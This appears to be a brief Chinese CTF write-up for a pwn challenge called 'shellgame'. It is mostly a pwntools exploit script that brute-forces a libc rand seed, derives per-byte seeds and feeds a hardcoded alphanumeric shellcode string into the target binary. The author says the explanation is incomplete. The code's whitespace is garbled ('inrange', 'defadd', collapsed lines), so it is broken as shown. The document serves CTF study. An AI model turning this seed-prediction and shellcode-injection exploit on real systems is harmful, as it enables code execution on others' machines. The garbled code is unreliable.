题目思路大概是通过给出的10个序列,爆破种子,恢复160个随机数。计算每一步需要加的随机数个数拼凑明文shellcode。
关于后面pid的绕过,crazyman的原话是:“the part about the value of pid can consider using the idea of simulation to obtain pid==1”。
我现在还没完全学会这道题,详细步骤还得等之后来写。
from pwn import * from ctypes import * io=process('./shellgame') #io=remote('127.0.0.1',11451) context.arch='amd64' context.log_level='debug' libc = ELF('./libc.so.6') rl = lambda a=False: io.recvline(a) ru = lambda a, b=True: io.recvuntil(a, b) rn = lambda x: io.recvn(x) sn = lambda x: io.send(x) sl = lambda x: io.sendline(x) sa = lambda a, b: io.sendafter(a, b) sla = lambda a, b: io.sendlineafter(a, b) irt = lambda: io.interactive() dbg = lambda text=None: gdb.attach(io, text) lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) uu32 = lambda data: u32(data.ljust(4, b'\x00')) uu64 = lambda data: u64(data.ljust(8, b'\x00')) clib = cdll.LoadLibrary("./libc.so.6") ru("Your lucky number is:\n") line = io.recvline().decode() data = line.split(' ')[:-1]
src = [] for i in data: src.append(int(i[2:])) for i inrange(len(src)): if src[i] < 0: src[i] = 0x100 + src[i] seed = 0 for i inrange(0x101): clib.srand(i) flag = 0 for j inrange(10): t = clib.rand() % 0x100 if t != src[j]: flag = 1 break
if flag == 0: seed = i break src = [0for i inrange(161)] clib.srand(seed) for i inrange(161): src[i] = clib.rand() % 0x100
seedlist = [] #shellcode = "W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W" shellcode="W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W" des=[] for i inrange(len(shellcode)+1): if i!=len(shellcode): des.append(hex(ord(shellcode[i]))) else: des.append(hex(0))
print(des) des=[] for i inrange(len(shellcode)+1): if i!=len(shellcode): des.append(ord(shellcode[i])) else: des.append(0) for i inrange(len(shellcode)+1): t = des[i] - src[i] if t < 0: t += 0x100 for j inrange(0x2000): clib.srand(j) if clib.rand() % 0x100 == t: seedlist.append(j) break src[i + 1] = (src[i + 1] + clib.rand() % 0x100) % 0x100 src[i + 2] = (src[i + 2] + clib.rand() % 0x100) % 0x100 print(seedlist)
defadd(idx,seed): sa(b'> ',b'1'.ljust(0x10,b'\x00')+p32(seed)) sa(b'> ',str(idx).ljust(0x14,'\x00')) for i inrange(1,len(seedlist)+1): add(i,seedlist[i-1]) io.send(b'4'.ljust(0x14,b'\x00'))